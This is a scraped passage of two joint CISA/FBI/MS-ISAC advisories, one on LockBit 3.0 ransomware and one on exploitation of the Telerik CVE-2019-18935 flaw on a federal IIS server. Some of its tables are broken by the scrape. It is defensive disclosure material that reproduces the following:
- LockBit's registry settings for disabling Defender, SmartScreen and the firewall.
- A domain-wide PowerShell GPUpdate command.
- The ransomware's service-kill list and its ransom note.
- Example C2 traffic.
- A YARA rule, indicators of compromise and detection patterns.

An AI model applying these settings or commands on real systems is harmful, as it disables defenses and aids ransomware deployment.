<NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBDMS" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBENGINE" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLFDLauncher" image="4" changed="%s" uid="%s" userContext="0" removePolicy="0" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLSERVERAGENT" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLServerOLAPService" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSASTELEMETRY" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLBrowser" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Client" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Controller" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MsDtsServer150" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISTELEMETRY150" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutMaster150" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutWorker150" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLLaunchpad" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLWriter" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLTELEMETRY" image="4" changed="%s" uid="%s" disabled="0"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLSERVER" image="4" changed="%s" uid="%s" disabled="0"> |
The following registry configuration changes values for the Group Policy refresh time, disable SmartScreen, and disable Windows Defender.
Registry Key | Registry Value | Value type | Data |
---|---|---|---|
HKLMSOFTWAREPoliciesMicrosoftWindow sSystem |
GroupPolicyRefresh TimeDC |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow sSystem |
GroupPolicyRefresh TimeOffsetDC |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow sSystem |
GroupPolicyRefresh Time |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow sSystem |
GroupPolicyRefresh TimeOffset |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow sSystem |
EnableSmartScreen |
REG_D WORD |
0 |
HKLMSOFTWAREPoliciesMicrosoftWindow sSystem |
**del.ShellSmartSc reenLevel |
REG_S Z |
|
HKLMSOFTWAREPoliciesMicrosoftWindow s Defender |
DisableAntiSpyware |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow s Defender |
DisableRoutinelyTa kingAction |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow s DefenderReal-Time Protection |
DisableRealtimeMon itoring |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow s DefenderReal-Time Protection |
DisableBehaviorMon itoring |
REG_D WORD |
1 |
HKLMSOFTWAREPoliciesMicrosoftWindow s DefenderSpynet |
SubmitSamplesConse nt |
REG_D WORD |
2 |
HKLMSOFTWAREPoliciesMicrosoftWindow s DefenderSpynet |
SpynetReporting |
REG_D WORD |
0 |
HKLMSOFTWAREPoliciesMicrosoftWindow sFirewallDomainProfile |
EnableFirewall |
REG_D WORD |
0 |
HKLMSOFTWAREPoliciesMicrosoftWindow sFirewallStandardProfile |
EnableFirewall |
REG_D WORD |
0 |
Once new group policies are added, a PowerShell command using Group Policy update (GPUpdate) applies the new group policy changes to all computers on the AD domain.
Force GPUpdate Powershell Command |
---|
powershell Get-ADComputer -filter * -Searchbase '%s' | Foreach-Object { Invoke- GPUpdate -computer $_.name -force -RandomDelayInMinutes 0} |
vss | sql | svc$ |
memtas | mepocs | msexchange |
sophos | veeam | backup |
GxVss | GxBlr | GxFWD |
GxCVD | GxCIMgr |
sql | oracle | ocssd |
dbsnmp | synctime | agntsvc |
isqlplussvc | xfssvccon | mydesktopservice |
ocautoupds | encsvc | firefox |
tbirdconfig | mydesktopqos | ocomm |
dbeng50 | sqbcoreservice | excel |
infopath | msaccess | mspu |
onenote | outlook | powerpnt |
steam | thebat | thunderbird |
visio | winword | wordpad |
notepad |
~~~ LockBit 3.0 the world's fastest and most stable ransomware from 2019~~~
>>>>> Your data is stolen and encrypted.
If you don't pay the ransom, the data will be published on our TOR darknet sites. Keep in mind that once your data appears on our leak site, it could be bought by your competitors at any second, so don't hesitate for a long time. The sooner you pay the ransom, the sooner your company will be safe.
If configured, Lockbit 3.0 will send two HTTP POST requests to one of the C2servers. Information about the victim host and bot are encrypted with an Advanced Encryption Standard (AES) key and encoded in Base64.
Example of HTTP POST request POST /?7F6Da=u5a0TdP0&Aojq=&NtN1W=OuoaovMvrVJSmPNaA5&fckp9=FCYyT6b7kdyeEXywS8I8 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate, br Content-Type: text/plain User-Agent: Safari/537.36 Host: Connection: Keep-Alive LIWy=RJ51lB5GM&a4OuN=&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI& 6SF3g=JPDt9lfJIQ&wQadZP= Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR& m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl Example of information found in encrypted data { "bot_version":"X", "bot_id":"X", "bot_company":"X", "host_hostname":"X", "host_user":"X", "host_os":"X", "host_domain":"X", "host_arch":"X", "host_lang":"X", "disks_info":[ { "disk_name":"X", "disk_size":"XXXX", "free_size":"XXXXX" } |
Mozilla/5.0 (Windows NT 6.1) |
AppleWebKit/587.38 (KHTML, like Gecko) |
Chrome/91.0.4472.77 |
Safari/537.36 | Edge/91.0.864.37 | Firefox/89.0 |
Gecko/20100101 |
See Table 3 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.
Initial Access | ||
---|---|---|
Technique Title | ID | Use |
Valid Accounts | T1078 | LockBit 3.0 actors obtain and abuse credentials of existing accounts as a means of gaining initial access. |
Exploit External Remote Services | T1133 | LockBit 3.0 actors exploit RDP to gain access to victim networks. |
Drive-by Compromise | T1189 | LockBit 3.0 actors gain access to a system through a user visiting a website over the normal course of browsing. |
Exploit Public-Facing Application | T1190 | LockBit 3.0 actors exploit vulnerabilities in internet-facing systems to gain access to victims’ systems. |
Phishing | T1566 | LockBit 3.0 actors use phishing and spearphishing to gain access to victims' networks. |
Execution | ||
Technique Title | ID | Use |
Execution | TA0002 | LockBit 3.0 launches commands during its execution. |
Software Deployment Tools | T1072 | LockBit 3.0 uses Chocolatey, a command- line package manager for Windows. |
Persistence | ||
Technique Title | ID | Use |
Valid Accounts | T1078 | LockBit 3.0 uses a compromised user account to maintain persistence on the target network. |
Boot or Logo Autostart Execution | T1547 | LockBit 3.0 enables automatic logon for persistence. |
Privilege Escalation | ||
Technique Title | ID | Use |
Privilege Escalation | TA0004 | Lockbit 3.0 will attempt to escalate to the required privileges if current account privileges are insufficient. |
Boot or Logo Autostart Execution | T1547 | LockBit 3.0 enables automatic logon for privilege escalation. |
Defense Evasion | ||
Technique Title | ID | Use |
Obfuscated Files or Information | T1027 | LockBit 3.0 will send encrypted host and bot information to its C2 servers. |
Indicator Removal: File Deletion | T1070.004 | LockBit 3.0 will delete itself from the disk. |
Execution Guardrails: Environmental Keying | T1480.001 | LockBit 3.0 will only decrypt the main component or continue to decrypt and/or decompress data if the correct password is entered. |
Credential Access | ||
Technique Title | ID | Use |
OS Credential Dumping: LSASS Memory | T1003.001 | LockBit 3.0 uses Microsoft Sysinternals ProDump to dump the contents of LSASS.exe. |
Discovery | ||
Technique Title | ID | Use |
Network Service Discovery | T1046 | LockBit 3.0 uses SoftPerfect Network Scanner to scan target networks. |
System Information Discovery | T1082 | LockBit 3.0 will enumerate system information to include hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices. |
System Location Discovery: System Language Discovery | T1614.001 | LockBit 3.0 will not infect machines with language settings that match a defined exclusion list. |
Lateral Movement | ||
Technique Title | ID | Use |
Remote Services: Remote Desktop Protocol | T1021.001 | LockBit 3.0 uses Splashtop remote- desktop software to facilitate lateral movement. |
Command and Control | ||
Technique Title | ID | Use |
Application Layer Protocol: File Transfer Protocols | T1071.002 | LockBit 3.0 uses FileZilla for C2. |
Protocol Tunnel | T1572 | LockBit 3.0 uses Plink to automate SSH actions on Windows. |
Exfiltration | ||
Technique Title | ID | Use |
Exfiltration | TA0010 | LockBit 3.0 uses Stealbit, a custom exfiltration tool first used with LockBit 2.0, to steal data from a target network. |
Exfiltration Over Web Service | T1567 | LockBit 3.0 uses publicly available file sharing services to exfiltrate a target’s data. |
Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | LockBit 3.0 actors use (1) rclone, an open source command line cloud storage manager to exfiltrate and (2) MEGA, a publicly available file sharing service for data exfiltration. |
Impact | ||
Technique Title | ID | Use |
Data Destruction | T1485 | LockBit 3.0 deletes log files and empties the recycle bin. |
Data Encrypted for Impact | T1486 | LockBit 3.0 encrypts data on target systems to interrupt availability to system and network resources. |
Service Stop | T1489 | LockBit 3.0 terminates processes and services. |
Inhibit System Recovery | T1490 | LockBit 3.0 deletes volume shadow copies residing on disk. |
Defacement: Internal Defacement | T1491.001 | LockBit 3.0 changes the host system’s wallpaper and icons to the LockBit 3.0 wallpaper and icons, respectively. |
The FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of LockBit 3.0’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The FBI, CISA, and the MS-ISAC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be legally shared, including:
The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at report@cisa.gov. State, local, tribal, and territorial (SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).
The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.
Your feedback is important. Please take a few minutes to share your opinions on this product through an anonymous Product Feedback Survey.
]]>From November 2022 through early January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) and authoring organizations identified the presence of indicators of compromise (IOCs) at a federal civilian executive branch (FCEB) agency. Analysts determined that multiple cyber threat actors, including an APT actor, were able to exploit a .NET deserialization vulnerability (CVE-2019-18935) in Progress Telerik user interface (UI) for ASP.NET AJAX, located in the agency’s Microsoft Internet Information Services (IIS) web server. Successful exploitation of this vulnerability allows for remote code execution. According to Progress Software, Telerik UI for ASP.NET AJAX builds before R1 2020 (2020.1.114) are vulnerable to this exploit.[1]
Actions to take today to mitigate malicious cyber activity:
CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to provide IT infrastructure defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.
Download the PDF version of this report:
For a downloadable copy of IOCs, see
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding detection and mitigation recommendations.
CISA and authoring organizations assess that, beginning as late as November 2022, threat actors successfully exploited a .NET deserialization vulnerability (CVE-2019-18935) in an instance of Telerik UI for ASP.NET AJAX Q2 2013 SP1 (version 2013.2.717) running on an FCEB agency’s Microsoft IIS server. This exploit, which results in interactive access with the web server, enabled the threat actors to successfully execute remote code on the vulnerable web server. Though the agency’s vulnerability scanner had the appropriate plugin for CVE-2019-18935, it failed to detect the vulnerability due to the Telerik UI software being installed in a file path it does not typically scan. This may be the case for many software installations, as file paths widely vary depending on the organization and installation method.
In addition to CVE-2019-18935, this version (2013.2.717) of Telerik UI for ASP.NET AJAX contains the following known vulnerabilities: CVE-2017-11357, CVE-2017-11317, and CVE-2017-9248. Analysis suggests that cyber threat actors exploited CVE-2019-18935 in conjunction with either CVE-2017-11357 or CVE-2017-11317. Australian Cyber Security Centre (ACSC) Advisory 2020-004 assesses that exploitation of CVE-2019-18935 is only possible with knowledge of Telerik RadAsyncUpload encryption keys.[2] Threat actors can obtain these keys through either prior knowledge or exploitation of vulnerabilities—CVE-2017-11357 or CVE-2017-11317—present in older, unpatched versions of Telerik released between 2007 and 2017. Forensic evidence is not available to definitively confirm exploitation of either CVE-2017-11357 or CVE-2017-11317.
CISA and authoring organizations observed multiple cyber threat actors, including an APT actor—hereafter referred to as Threat Actor 1 (TA1)—and known cybercriminal actor XE Group—hereafter referred to as Threat Actor 2 (TA2)—conducting reconnaissance and scanning activities [T1595.002] that correlate to the successful exploitation of CVE-2019-18935 in the agency’s IIS server running Telerik UI for ASP.NET AJAX [T1190].
When exploiting the vulnerability, the threat actors uploaded malicious dynamic-link library (DLL) files (some masqueraded as portable network graphics [PNG] files) [T1105] to the C:WindowsTemp
directory. The malicious files were then executed from the C:WindowsTemp
directory via the w3wp.exe
process—a legitimate process that runs on IIS servers. This process is routine for handling requests sent to web servers and delivering content. The review of antivirus logs identified that some DLL files were created [T1055.001] and detected as early as August 2021.
CISA and authoring organizations confirmed that some malicious files dropped on the IIS server are consistent with a previously reported file naming convention that threat actors commonly use when exploiting CVE-2019-18935.[3] The threat actors name the files in the Unix Epoch time format and use the date and time as recorded on the target system. The file naming convention follows the pattern [10 digits].[7 digits].dll
(e.g., a file created on October 31, 2022, could be 1667203023.5321205.dll
).
The names of some of the PNG files were misleading. For example, file 1596835329.5015914.png
, which decodes to August 7, 2020, 21:22:09 UTC, first appeared on October 13, 2022, but the file system shows a creation date of August 7, 2020. The uncorrelated Unix Epoch time format may indicate that the threat actors used the timestomping [T1070.006] technique. This file naming convention is a primary IOC used by the threat actors.
In many cases, malicious artifacts were not available for analysis because the threat actors’ malware—that looks for and removes files with the .dll file extension—removed files [T1070.004] from the C:WindowsTemp
directory. Through full packet data capture analysis and reverse engineering of malicious DLL files, no indications of additional malicious activity or sub-processes were found executed by the w3wp.exe
process. CISA observed error messages being sent to the threat actors’ command and control (C2) server when permission restraints prevented the service account from executing the malicious DLLs and writing new files.
Network activity analysis was consistent with the artifacts provided for review. Analysts did not observe evidence of privilege escalation or lateral movement.
CISA and authoring organizations observed TA1 exploiting CVE-2019-18935 for system enumeration beginning in August 2022. The vulnerability allows a threat actor to upload malicious DLLs on a target system and execute them by abusing a legitimate process, e.g., the w3wp.exe
process. In this instance, TA1 was able to upload malicious DLL files to the C:WindowsTemp directory and then achieve remote code execution, executing the DLL files via the w3wp.exe process.
At least nine DLL files used for discovery [TA0007], C2 [TA0011], and defense evasion [TA0005]. All of the analyzed samples have network parameters, including host name, domain name, Domain Name System (DNS) server Internet Protocol (IP) address and machine name, Network Basic Input/Output System (NetBIOS) ID, adapter information, IP address, subnet, gateway IP, and Dynamic Host Configuration Protocol (DHCP) server [T1016]. All analyzed samples communicate this collected data to a C2 server at IP address 137.184.130[.]162
or 45.77.212[.]12
. The C2 traffic to these IP addresses uses a non-application layer protocol [T1095] by leveraging Transmission Control Protocol (TCP) clear text (i.e., unencrypted) over port 443. Analysis also identified that:
.dll
extension in the C:WindowsTemp
directory on the server. TA1 may use this capability to hide additional malicious activity on the network.CISA, in coordination with the authoring organizations, identified and observed the following threat actor IPs and timestamps associated with this activity:
IP Address |
First Identified |
Last Identified |
137.184.130[.]162 |
09/26/2022 |
10/08/2022 |
45.77.212[.]12 |
10/07/2022 |
11/25/2022 |
104.225.129[.]102 |
10/10/2022 |
11/16/2022 |
149.28.85[.]24 |
10/12/2022 |
10/17/2022 |
185.186.245[.]72 |
10/18/2022 |
10/18/2022 |
193.8.172[.]113 |
09/25/2022 |
09/25/2022 |
193.8.172[.]13 |
09/25/2022 |
10/17/2022 |
216.120.201[.]12 |
10/13/2022 |
11/10/2022 |
5.34.178[.]246 |
09/25/2022 |
09/25/2022 |
79.133.124[.]242 |
09/25/2022 |
09/25/2022 |
92.38.169[.]193 |
09/27/2022 |
10/08/2022 |
92.38.176[.]109 |
09/12/2022 |
09/25/2022 |
92.38.176[.]130 |
09/25/2022 |
10/07/2022 |
TA2—identified as likely the cybercriminal actor XE Group—often includes xe[word]
nomenclature in original filenames and registered domains. Volexity lists this naming convention and other observed TTPs as common for this threat actor group.[4]
As early as August 2021, CISA and authoring organizations observed TA2 delivering malicious PNG files that, following analysis, were masqueraded DLL files to avoid detection [T1036.005]. Similar to TA1, TA2 exploited CVE-2019-18935 and was able to upload at least three unique DLL files into the C:WindowsTemp
directory that TA2 executed via the w3wp.exe
process. These DLL files drop and execute reverse (remote) shell utilities for unencrypted communication with C2 IP addresses associated with the malicious domains listed in Table 2. Note: At the time of analysis, the domains resolved to the listed IP addresses.
IP Address |
Resolving Domains |
---|---|
184.168.104[.]171 |
xework[.]com xegroups[.]com hivnd[.]com |
144.96.103[.]245 |
xework[.]com |
Analysis of DLL files determined the files listed in Table 3 were dropped, decoded, and attempted to connect to the respective malicious domains. Embedded payloads dropped by the DLL files were observed using the command line utility certutil[.]exe
and writing new files as xesvrs[.]exe
to invoke reverse shell utilities execution.
Filename |
Description |
---|---|
XEReverseShell.exe |
DLL files (masqueraded as PNG files) located in the When executed, the reverse shell utility attempts to connect to Note: It is likely the threat actors changed the file extension from .dll to .png to avoid detection. |
Multi-OS_ReverseShell.exe |
Reverse shell utility decoded from the base64 encoded file When executed, it will attempt to connect to |
SortVistaCompat |
Base64 encoded payload dropped from |
When the TA2 malware is executed a DLL file drops an executable (XEReverseShell.exe
) that attempts to pull a C2 IP address and port number from xework[.]com
or xegroups[.]com
.
If communication is established between the TA2 malware and the C2:
xesetshell
, causing the malware to connect to the server and download a file called small.txt—a base64-encoded webshell that the malware decodes and places in the C:WindowsTemp
directory.xequit
, causing the malware to sleep for a period of time determined by the threat actors.The two files xesmartshell.tmp
and SortVistaCompat
have the capability to drop an Active Server Pages (ASPX) webshell—a base64 encoded text file small.txt
decoded [T1140] as small.aspx
[T1505.003]—to enumerate drives; to send, receive, and delete files; and to execute incoming commands. The webshell contains an interface for easily browsing files, directories, or drives on the system, and allows the user to upload or download files to any directory. No webshells were observed to be dropped on the target system, likely due to the abused service account having restrictive write permissions.
For more information on the DLLs, binaries, and webshell, see CISA MAR-10413062-1.v1 Telerik Vulnerability in U.S. Government IIS Server.
See Table 4 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.
Reconnaissance |
||
---|---|---|
ID |
Use |
|
Active Scanning: Vulnerability Scanning |
Actors were observed conducting active scanning activity for vulnerable devices and specific ports. |
|
Initial Access |
||
Technique Title |
ID |
Use |
Exploit Public-Facing Application |
Actors exploited a known vulnerability in the Microsoft IIS server. |
|
Persistence |
||
Technique Title |
ID |
Use |
Server Software Component: Web Shell |
TA2’s malware dropped an ASPX webshell to enumerate drives; send, receive, and delete files; and execute commands. |
|
Defense Evasion |
||
Technique Title |
ID |
Use |
Masquerading: Match Legitimate Name or Location |
Actors leveraged the legitimate |
|
Process Injection: DLL Injection |
Actors loaded newly created DLLs into a running |
|
Indicator Removal: File Deletion |
TA1’s malware deleted files with ".dll" from the |
|
Indicator Removal: Timestomp |
Actors modified file time attributes to insert misleading creation dates. |
|
Decode Files |
The base64 encoded text file |
|
Discovery |
||
Technique Title |
ID |
Use |
File and Directory Discovery |
Actors enumerated the IIS server via OS fingerprinting, executed Windows processes, and collected network information. TA1’s malware enumerates systems, processes, files, and directories. |
|
System Network Configuration Discovery |
TA1’s malware gathers network parameters, including host name, domain name, DNS servers, NetBIOS ID, adapter information, IP address, subnet, gateway IP, and DHCP server. |
|
Command and Control |
||
Technique Title |
ID |
Use |
Ingress Tool Transfer |
TA1 and TA2 uploaded malicious DLL files (some masqueraded as PNG files) to the |
|
Non-Application Layer Protocol |
Actors used a non-application layer protocol (TCP) for |
CISA and authoring organizations recommend that organizations review the steps listed in this section and Table 4: Identified ATT&CK Techniques for Enterprise to detect similar activity on IIS servers.
CISA developed the following YARA rule from the base proof-of-concept code for CVE-2019-18935.[5] Note: Authoring organizations do not guarantee all malicious DLL files (if identified) will use the same code provided in this YARA rule.
rule CISA_10424018_01 {
meta:
Author = "CISA Code & Media Analysis"
Incident = "10424018"
Date = "2023-02-07"
Last_Modified = "20230216_1500"
Actor = "n/a"
Family = "n/a"
Capabilities = "n/a"
Malware_Type = "n/a"
Tool_Type = "n/a"
Description = "Detects open-source exploit samples"
SHA256 = "n/a"
strings:
$s0 = { 3D 20 7B 20 22 63 6D 22 2C 20 22 64 2E 65 22 2C }
$s1 = { 20 22 78 22 2C 20 22 65 22 20 7D 3B }
$s2 = { 52 65 76 65 72 73 65 53 68 65 6C 6C 28 29 }
$s3 = { 54 65 6C 65 72 69 6B 20 55 49 }
$s4 = { 66 69 6C 65 6E 61 6D 65 5F 6C 6F 63 61 6C }
$s5 = { 66 69 6C 65 6E 61 6D 65 5F 72 65 6D 6F 74 65 }
$s6 = { 41 55 43 69 70 68 65 72 2E 65 6E 63 72 79 70 74 }
$s7 = { 31 32 31 66 61 65 37 38 31 36 35 62 61 33 64 34 }
$s8 = { 43 6F 6E 6E 65 63 74 53 74 61 67 69 6E 67 53 65 72 76 65 72 28 29 }
$s9 = { 53 74 61 67 69 6E 67 53 65 72 76 65 72 53 6F 63 6B 65 74 }
$s10 = { 2A 62 75 66 66 65 72 20 3D 20 28 75 6E 73 69 67 6E 65 }
$s11 = { 28 2A 29 28 29 29 62 75 66 66 65 72 3B 0A 20 20 20 20 66 75 6E 63 28 29 3B }
$s12 = { 75 70 6C 6F 61 64 28 70 61 79 6C 6F 61 64 28 54 65 6D 70 54 61 72 67 65 74 }
$s13 = { 36 32 36 31 36 66 33 37 37 35 36 66 32 66 }
condition:
($s0 and $s1 and $s2) or ($s3 and $s4 and $s5 and $s6 and $s7) or ($s8 and $s9 and $s10 and $s11) or ($s12 and $s13)
}
CISA, FBI, and MS-ISAC recommend that organizations utilize a centralized log collection and monitoring capability, as well as implement or increase logging and forensic data retention. Longer retention policies improve the availability of data for forensic analysis and aid thorough identification of incident scope.
CISA, FBI, and MS-ISAC recommend that organizations use process monitoring—which provides visibility into file system and application process activity—to detect suspicious executable files running from the C:WindowsTemp
directory. Process monitoring via Windows Event Code 4688 will detect the legitimate w3wp.exe
process running suspicious DLL files and other anomalous child processes. Note: Enabling this event may inundate security event logging. Use centralized log collection to prevent log rollover, increase log retention and archiving, and/or enable command line event logging.
Forensic analysis commonly identified the threat actors taking the following steps:
C:WindowsTemp1665890187.8690152.dll
) by process w3wp.exe
PID 6484.w3wp.exe
PID 6484. w3wp.exe
PID 6484 to 45.77.212[.]12
over port 443.C:WindowsSystem32vcruntime140.dll
(Windows C runtime library) to execute payload.Steps 1 and 2 occur every time a malicious DLL file is created. In some cases, an ASP .NET temp file was created, but this may have indicated benign IIS server activity. Note: The Process ID (PID) used in this example is unique to this investigation and is not universal. IP address 45.77.212[.]12
correlates to TA1, but the pattern can be used as general practice to identify similar activity.
The following information was derived from artifact analysis and is provided to equip IT infrastructure defenders searching for similar activity on an IIS server. Several artifacts can be referenced to assist in determining if CVE-2019-18935 has been successfully exploited.
When this CVE is exploited, it uploads malicious DLL files to the C:WindowsTemp
directory. The malicious DLL file naming convention translates to the exact time the file was uploaded to the server.
The time is represented in a series of digits, known as Unix Epoch time. The files observed during this investigation contained two sets of digits separated by a period (.) before the DLL extension (.dll). Example: 1667206973.2270932.dll
Nearly all recovered files contain a series of 10 digits to the left of the period (.) and seven digits to the right. However, one file contained only five digits in the second set, which should be taken into consideration when writing regex patterns to search for the existence of these files. Example Regex: d{10}.d{1,8}.dll
These numbers can be copied and translated from digits into readable language with the month, day, year, hour, minute, and seconds displayed.
When investigating IIS logs, specific fields were searched for and captured during the time of each connection.
If the Unix Epoch time signature has been translated from a DLL filename, specific logs can be searched based on that time. However, if the Unix Epoch time signature has not been translated, the following will still work, but may take longer for the query to run.
The four most important fields to identify this traffic are noted in the following table. These descriptions are sourced directly from Microsoft.[6]
General Name |
Field Name |
Description |
Method |
cs-method |
Requested action; for example, a GET method |
URI Stem |
cs-uri-stem |
Universal Resource Identifier (URI), or target, of the action |
URI Query |
cs-uri-query |
The query, if any, that the client was trying to perform; A URI query is necessary only for dynamic pages. |
Protocol Status |
sc-status |
Hypertext Transfer Protocol (HTTP) or File Transfer Protocol (FTP) status code |
Note: Depending on how logs are collected and stored, the field names may not be an exact match; this should be taken into consideration when constructing queries.
When ingesting logs into security information and event management (SIEM), the final field names did not use a hyphen (-) but used an underscore (_).
Example: cs_method instead of cs-method
Field Name |
Artifact |
---|---|
cs-method |
POST |
>cs-uri-stem |
/Telerik.Web.UI.WebResource.axd |
cs-uri-query |
type=rau |
sc-status |
200 and 302 |
When reviewing logs, two IIS events were observed with the same timestamp each time this CVE-2019-18935 was exploited. Both events contained the same information in the cs-method, cs-uri-stem, and cs-uri-query. One event had a sc-status of 200 and the other had a sc-status of 302.
Kroll Artifact Parser and Extractor (KAPE), a forensic artifact collector and parser, was used to extract the Windows event logs from a backup image of the compromised IIS server. All field names refer to the labels provided via KAPE exports. The strings are of value and can be used to locate other artifacts if different tools are used. Note: The payload data in the following table has been shortened to only necessary strings to obscure and protect victim information.
EventID |
Payload |
---|---|
1309 |
3005, An unhandled exception has occurred[*redacted*]w3wp.exe[*redacted*]InvalidCastException, Unable to cast object of type 'System.Configuration.Install.AssemblyInstaller' to type 'Telerik.Web.UI.IAsyncUploadConfiguration'.n at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)nn, [*redacted*]/Telerik.Web.UI.WebResource.axd?type=rau, /Telerik.Web.UI.WebResource.axd, [*redacted*], False, [*redacted*], 15, [*redacted*], False, at Telerik.Web.UI.AsyncUploadHandler.GetConfiguration(String rawData)n at Telerik.Web.UI.AsyncUploadHandler.EnsureSetup()n at Telerik.Web.UI.AsyncUploadHandler.ProcessRequest(HttpContext context)n at Telerik.Web.UI.HandlerRouter.ProcessHandler(String handlerKey, HttpContext context)n at Telerik.Web.UI.WebResource.ProcessRequest(HttpContext context)n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()n at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step)n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)n","Binary":""}} |
Authoring organizations recommend looking for the following key strings in the payload:
w3wp.exe
: This is the parent process that executes the code inside the malicious DLLs.System.Configuration.Install.AssemblyInstaller
